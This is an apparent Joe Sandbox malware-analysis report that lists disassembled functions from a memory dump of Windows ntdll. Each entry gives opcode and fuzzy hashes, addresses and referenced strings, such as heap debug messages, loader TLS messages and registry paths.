                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: b406f46786c8c9fcb5f70d3be0da0139b424299b5489471fac41073e809425c4
                                              • Instruction ID: 5708cd84740e26517fc9f487db95dd750d9e529dda3fb5259a44ed61d1bd726b
                                              • Opcode Fuzzy Hash: b406f46786c8c9fcb5f70d3be0da0139b424299b5489471fac41073e809425c4
                                              • Instruction Fuzzy Hash: AC517B75A0071AAFDB06CF65CD80B9ABBB6FF49350F144065E9169B790DB30ED11CB90
                                              Function 36951F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: a5b18ee6c78e389d3c3cb0ffebccff20cdf620a9d04d2f527983fa60eb82b805
                                              • Instruction ID: 1d85f778da3013478945b0e32ea3865da4ce8a389b84564a2e33e7e82d8661a2
                                              • Opcode Fuzzy Hash: a5b18ee6c78e389d3c3cb0ffebccff20cdf620a9d04d2f527983fa60eb82b805
                                              • Instruction Fuzzy Hash: 3922F1B4A00355AFEB11CF25C890B7ABBF9EF05708F358499E5558B382D735E882CB91
                                              Function 36941460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                              Download Yara Rule
                                              Strings
                                              • HEAP: , xrefs: 36941596
                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36941728
                                              • HEAP[%wZ]: , xrefs: 36941712
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: 59180af47e197d27b747b74cb4dadcb1e36b0d0d41d8400cdce7b56f21bf2b7a
                                              • Instruction ID: c6d0fbcc8488d8167d366a1e57087b54d63cd7c5dbe488d723ddff3a51f09023
                                              • Opcode Fuzzy Hash: 59180af47e197d27b747b74cb4dadcb1e36b0d0d41d8400cdce7b56f21bf2b7a
                                              • Instruction Fuzzy Hash: B5E10174A043559FE716CF2AC851BBABBF5AF48348F24885DE596CB246DB34E840CB90
                                              Function 3694B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                              • API String ID: 0-1145731471
                                              • Opcode ID: ec1033037980dcd6f46c3dc19b22614e346f1362492440d350f30154622ee40c
                                              • Instruction ID: 370de541fa80d9852f035b3c91896cf28427d6016785392d748f19da5c8ab626
                                              • Opcode Fuzzy Hash: ec1033037980dcd6f46c3dc19b22614e346f1362492440d350f30154622ee40c
                                              • Instruction Fuzzy Hash: 77B1BD75E147158FEB26DF6AC880B9DB7F5AF48394F254529E811EB788D730E840CB50
                                              Function 369C368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                              • API String ID: 0-2391371766
                                              • Opcode ID: 385224a690fd851f640e33d380015d6261bf3037cde0406f7c8a6edec198535e
                                              • Instruction ID: 60ee16a681aba07eb6447a7dabcecc8c808ff2fd54c88fadc3fe84af07ea3493
                                              • Opcode Fuzzy Hash: 385224a690fd851f640e33d380015d6261bf3037cde0406f7c8a6edec198535e
                                              • Instruction Fuzzy Hash: A9B18CB1A04345AFE711CF55CC80B5BB7E8AB88764F61082AFA40AB280D774EC15CB93
                                              Function 369D36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                              • API String ID: 0-318774311
                                              • Opcode ID: cbe1f1857f0ad48781a1f05c4895a94c951d63e99e3a832634fc7c3cc7467f9c
                                              • Instruction ID: ba5b32b32b266092804f1497aec0141fb65323c341788438dabe04c9f22733ec
                                              • Opcode Fuzzy Hash: cbe1f1857f0ad48781a1f05c4895a94c951d63e99e3a832634fc7c3cc7467f9c
                                              • Instruction Fuzzy Hash: A6817CB5A08740EFE311CB15C840B6AB7E8EF8A755F54892DF980DB391EB74D904CB92
                                              Function 369C7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                              • API String ID: 0-3870751728
                                              • Opcode ID: f01e8a8d5bf2a32b182223a2d082c9a6af7b25b2815b7230a7b58a87f8210530
                                              • Instruction ID: c39f6ee66fed9288f94a0e0b4b826190ee4928dec38c6dd80f360b2564c2b3c9
                                              • Opcode Fuzzy Hash: f01e8a8d5bf2a32b182223a2d082c9a6af7b25b2815b7230a7b58a87f8210530
                                              • Instruction Fuzzy Hash: 3A917CB0E006159FEB14CF69C984BADBBF1FF48354F24816AD905AB391E7359842CF92
                                              Function 3694B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                              • API String ID: 0-373624363
                                              • Opcode ID: 2d3189d125b4bfb3110faa3c3dd0e230c8d1d218feb4435e1387a92975f053e3
                                              • Instruction ID: 03bcadf3fdb7e41f71f8f39bfa75a7bb2f6d2f829190c10530145051871ab9ed
                                              • Opcode Fuzzy Hash: 2d3189d125b4bfb3110faa3c3dd0e230c8d1d218feb4435e1387a92975f053e3
                                              • Instruction Fuzzy Hash: 9A91AEB5E04319CFEB22DF59C840BAEB7B4EF05364F214196E811EB294D7789E40CB91
                                              Function 3697909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$&$@
                                              • API String ID: 0-1537733988
                                              • Opcode ID: 8b095217a7f05edfefcf237be3ce2d41b7f6954b71f706d7c96cbe584a6ad996
                                              • Instruction ID: be184d96b10249a3d9d072a00b2c32d327075bf802483240b962ec703d3715cc
                                              • Opcode Fuzzy Hash: 8b095217a7f05edfefcf237be3ce2d41b7f6954b71f706d7c96cbe584a6ad996
                                              • Instruction Fuzzy Hash: F471D274A08301DFEB10DF25C980A1BBBEEFF85758F208A1DE49987291D731D906CB92
                                              Function 36A1B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                              Download Yara Rule
                                              Strings
                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36A1B82A
                                              • GlobalizationUserSettings, xrefs: 36A1B834
                                              • TargetNtPath, xrefs: 36A1B82F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                              • API String ID: 0-505981995
                                              • Opcode ID: e4e8e724f6e4fac6c78156381909360eb50288e3ae6bf438703545e456ebabce
                                              • Instruction ID: ba9111c2e8c19b3b636227839bc3f62caa8a5ec7a8e1b69684be1d2afde6f2e3
                                              • Opcode Fuzzy Hash: e4e8e724f6e4fac6c78156381909360eb50288e3ae6bf438703545e456ebabce
                                              • Instruction Fuzzy Hash: B9619D72D01229AFDB21DF55CC98BDAB7F8AF18750F5101E9A908AB250DB34DE85CF90
                                              Function 3693F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                              Download Yara Rule
                                              Strings
                                              • HEAP: , xrefs: 3699E6B3
                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3699E6C6
                                              • HEAP[%wZ]: , xrefs: 3699E6A6
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                              • API String ID: 0-1340214556
                                              • Opcode ID: 04d89eb1e82eb187150dc356050af2e5fc2aefcfdef3cfe00334fe6d5540efc4
                                              • Instruction ID: 4913350ea203f467e7db564ecd7382b9fcf75adfe51a04b37af0facc3131df83
                                              • Opcode Fuzzy Hash: 04d89eb1e82eb187150dc356050af2e5fc2aefcfdef3cfe00334fe6d5540efc4
                                              • Instruction Fuzzy Hash: FD51E275A11B84EFE312CBA9C984F9ABBF8EF05344F2400A5E681CB692D734ED41CB51
                                              Function 369615F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                              Download Yara Rule
                                              Strings
                                              • minkernel\ntdll\ldrmap.c, xrefs: 369AA59A
                                              • LdrpCompleteMapModule, xrefs: 369AA590
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 369AA589
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: 7a53f357e561bd0fe7313c324cdd6bb2a3f5feae7a9369160fd4a8fdfabc8e88
                                              • Instruction ID: c41bc96c336212383ef94efdf9eed949f00491424e44a0f8c45b9ae8befbbe27
                                              • Opcode Fuzzy Hash: 7a53f357e561bd0fe7313c324cdd6bb2a3f5feae7a9369160fd4a8fdfabc8e88
                                              • Instruction Fuzzy Hash: 9D511478A007859FF721CB1ECD44B0A7BE8AF00768F280195E9919B6E2DB74ED01CB85
                                              Function 3693758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                              • API String ID: 0-1151232445
                                              • Opcode ID: 82122867d3245909e5d47a3f024367ef67c1f127bac6c21c51af1eb10edadf47
                                              • Instruction ID: cc8a8fb71eeb161930f11a82b0cfd451350ae4dc5dd6d4c43a01ed9cbe850d32
                                              • Opcode Fuzzy Hash: 82122867d3245909e5d47a3f024367ef67c1f127bac6c21c51af1eb10edadf47
                                              • Instruction Fuzzy Hash: 6A4138B4B013808FFB25CE1DC8987AA77E4DF0139CF744499D4468F246DAA4D886DF56
                                              Function 369716CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                              Download Yara Rule
                                              Strings
                                              • minkernel\ntdll\ldrtls.c, xrefs: 369B1B4A
                                              • LdrpAllocateTls, xrefs: 369B1B40
                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 369B1B39
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-4274184382
                                              • Opcode ID: 38b4bbde86a2b1bfc3816ea791b323663fa5c7d8970f70a8411761ff6a7da056
                                              • Instruction ID: e7fd5bc137417df129046d4cff2f3b2c0cf729c71a4e94b7180c19a4aadd7829
                                              • Opcode Fuzzy Hash: 38b4bbde86a2b1bfc3816ea791b323663fa5c7d8970f70a8411761ff6a7da056
                                              • Instruction Fuzzy Hash: 694156B5E00609EFDB15CFA9CC40AAEBBB6FF48754F648119E505A7211EB35A901CF90
                                              Function 369F5180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-964947082
                                              • Opcode ID: 6f38c7198032369259b0b3adaf447e3a37e44a799c898d49bdaa402370642bfa
                                              • Instruction ID: 3a5654e7ba0526ddaba5fde3cd45940bb3890ac294ebb1aa7a4fe4fc992a7c26
                                              • Opcode Fuzzy Hash: 6f38c7198032369259b0b3adaf447e3a37e44a799c898d49bdaa402370642bfa
                                              • Instruction Fuzzy Hash: 0041B1B5A21348EFD710CF598C90AAA3BE9EB54395F324159EA019F242CA32DC56CB51
                                              Function 369733A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              • RtlCreateActivationContext, xrefs: 369B29F9
                                              • SXS: %s() passed the empty activation context data, xrefs: 369B29FE
                                              • Actx , xrefs: 369733AC
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                              • API String ID: 0-859632880
                                              • Opcode ID: 4198255e51fabb4f4e76420be4171f359bd926a6b7aa2e4c7cf3746c9cf63ed9
                                              • Instruction ID: 07a2b7ece50c2d416f3ac4219c32f90049fadfa82850a3f4f30fb927aceb7a6b
                                              • Opcode Fuzzy Hash: 4198255e51fabb4f4e76420be4171f359bd926a6b7aa2e4c7cf3746c9cf63ed9
                                              • Instruction Fuzzy Hash: E03124326103159FEF16CF5AC880BA677A8EF48720F614469ED049F286CB31DC41CBD1
                                              Function 369CB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                              Download Yara Rule
                                              Strings
                                              • GlobalFlag, xrefs: 369CB68F
                                              • @, xrefs: 369CB670
                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 369CB632
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                              • API String ID: 0-4192008846
                                              • Opcode ID: 662cbd1fab9daca6c82396bda6db552fbf217b56967cfbeec50da9b6eb1a01f4
                                              • Instruction ID: acad583ff6f9cd379aaabbe3a9b3be7dcb744007ebd0719f9ed3f34462dbb5f9
                                              • Opcode Fuzzy Hash: 662cbd1fab9daca6c82396bda6db552fbf217b56967cfbeec50da9b6eb1a01f4
                                              • Instruction Fuzzy Hash: 26316AB1E40609AFDB00DFA5DD80AEFBBBCEF44744F5004A9EA05A7255E7349E04CBA5
                                              Function 369E13B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                              • API String ID: 0-1050206962
                                              • Opcode ID: 00faa0b748f27516fcbfdd068a339620c0d0c0bfd5272ea327de757672201064
                                              • Instruction ID: 19d4552638fb206709a66387f93be00b147c9f72cb702c60e108183efcabc248
                                              • Opcode Fuzzy Hash: 00faa0b748f27516fcbfdd068a339620c0d0c0bfd5272ea327de757672201064
                                              • Instruction Fuzzy Hash: 95316B76D00219AFEB12DF95CC84EEEFBBDEB44658F410066EA00A7211E738DD44CBA1
                                              Function 36971607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                              Download Yara Rule
                                              Strings
                                              • minkernel\ntdll\ldrtls.c, xrefs: 369B1A51
                                              • DLL "%wZ" has TLS information at %p, xrefs: 369B1A40
                                              • LdrpInitializeTls, xrefs: 369B1A47
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-931879808
                                              • Opcode ID: cf0d523d4b945f398e26f3d1705d5c9b3da3ce66e98cd705fb5e70746a157d11
                                              • Instruction ID: 7b4e64d7e435ef0d0d7278b473663d6b3a3e10ae5a5daa1720f5000be1c8fe43
                                              • Opcode Fuzzy Hash: cf0d523d4b945f398e26f3d1705d5c9b3da3ce66e98cd705fb5e70746a157d11
                                              • Instruction Fuzzy Hash: C731E271A10305ABF712CB5CCC45FAA7BBDBF44798F290159EA00B7180DB70BE468B91
                                              Function 36981270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                              Download Yara Rule
                                              Strings
                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3698127B
                                              • BuildLabEx, xrefs: 3698130F
                                              • @, xrefs: 369812A5
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 0-3051831665
                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                              • Instruction ID: ccb02f33b23a3871ed5ae55b601449104bed28c635869845029e68e677fc581d
                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                              • Instruction Fuzzy Hash: 29318B72900219ABDF11DF95CC44EEEBBBDEB84750F004026E904A7261E730DE05CBA5
                                              Function 369374B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: RtlValidateHeap
                                              • API String ID: 3446177414-1797218451
                                              • Opcode ID: 168ac347900a5eb0018afd335d3fbd40f597407f48859671646179fd72474164
                                              • Instruction ID: 245fbe4885b012aad0d45e7927bfbdaa48780833d435e561ed51e795b057d307
                                              • Opcode Fuzzy Hash: 168ac347900a5eb0018afd335d3fbd40f597407f48859671646179fd72474164
                                              • Instruction Fuzzy Hash: D4411F76E013859FEB06CFA4CC947ADBBB6FF84254F248258D811AB281CB348901DBA5
                                              Function 369E705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
